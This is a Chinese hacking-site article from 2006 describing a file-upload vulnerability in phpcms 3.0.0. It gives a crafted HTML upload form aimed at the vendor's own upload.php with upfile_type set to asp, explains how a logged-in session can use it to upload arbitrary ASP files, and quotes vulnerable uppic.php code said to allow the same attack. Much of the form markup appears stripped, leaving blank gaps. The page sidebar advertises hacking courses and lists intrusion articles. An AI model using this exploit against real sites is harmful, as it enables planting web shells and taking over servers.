黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 文章正文
[推荐]phpcms 3.0.0文件上传漏洞
      ★★★★★
phpcms 3.0.0文件上传漏洞
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-12-8

程序代码



















action="http://www.phpcms.cn/ads/upload.php?action=upload&url=&upfile_type=asp" enctype="multipart/form-data" onSubmit="return checkform();">


文件上传



选择:

 










现在可以上传asp文件了,用登录后的窗口打开这个文件(保存session),上传的文件名后缀跟form表单里action属性的upfile_type变量是一样的,上传后返回页面源代码如下:

程序代码



还有uppic.php也有同样漏洞漏洞代码如下:
程序代码
include PHPCMS_ROOT."/class/upload.php";
  $fileArr = array('file'=>$uploadfile,'name'=>$uploadfile_name,'size'=>$uploadfile_size,'type'=>$uploadfile_type);
  
  $uploadfiletype = $uploadfiletype ? $uploadfiletype : $_PHPCMS['uploadfiletype'];
  $savepath = $uploaddir ? $channeldir."/".$uploaddir."/".date("Ym")."/" : $_PHPCMS['uploaddir']."/".date("Ym")."/";


利用原理一样................... -:)

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    利用php.exe进行入侵04-08
    渗透心得04-07
    魔力论坛最新漏洞利用04-07
    织梦内容管理系统(DEDECMS)3.X04-07
    asp.dll解析成system提升权限04-06
    webshell+serv-u获取系统最高权限04-06
    一次完全利用社会工程学的域名劫03-28
    利用DNS欺骗在局域网中挂马03-21
    渗透某资源网站笔记03-20
    渗透同学学校网络03-20
    针对虚拟主机提升权限的实现03-20
    利用QQ文件共享漏洞入侵 Windows03-20
    相 关 文 章
  • system32下的文件说明 种马还是杀毒都需

  • PjBlog 最新上传漏洞利用

  • 魔力论坛最新漏洞利用

  • 织梦内容管理系统(DEDECMS)3.X+4.X上

  • dxbbs漏洞(通杀7.3以前所有版本)

  • Vista+谷歌拼音输入法重现输入法漏洞

  • Vista文件拷贝慢如蜗牛 下载补丁可修复

  • 利用微软动画光标漏洞的复合型蠕虫现身

  • ANI 漏洞第三方补丁被破[附新的第三方补

  • 稳打稳扎 驱逐Windows系统“流氓”文件

  • QQ Traveler漏洞分析与利用(0day)

  • 对于最近几天的IE新漏洞临时解决方法

  • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886